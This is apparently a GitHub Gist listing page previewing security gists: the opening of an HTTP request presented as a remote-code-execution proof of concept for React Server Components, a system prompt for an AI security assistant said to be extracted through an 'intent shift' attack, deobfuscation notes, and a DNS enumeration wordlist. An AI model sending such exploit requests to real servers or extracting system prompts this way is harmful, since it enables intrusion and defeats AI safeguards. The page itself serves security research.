Skip to content

Instantly share code, notes, and snippets.

@maple3142
maple3142 / CVE-2025-55182.http
Last active February 10, 2026 16:49
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@ThanniKudam
ThanniKudam / hacktron-systemprompt.md
Created November 22, 2025 03:42
Hacktron.AI system prompt - Technique used: Intent Shift Attacks - Reference: https://arxiv.org/html/2505.17519v2

<complete_system_prompt>
You are hacktron, a powerful security research assistant.

## Mission                                                                                                                                                                                                        
@0xdevalias
0xdevalias / _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active February 10, 2026 19:48
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
@jhaddix
jhaddix / all.txt
Last active January 31, 2026 07:24
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎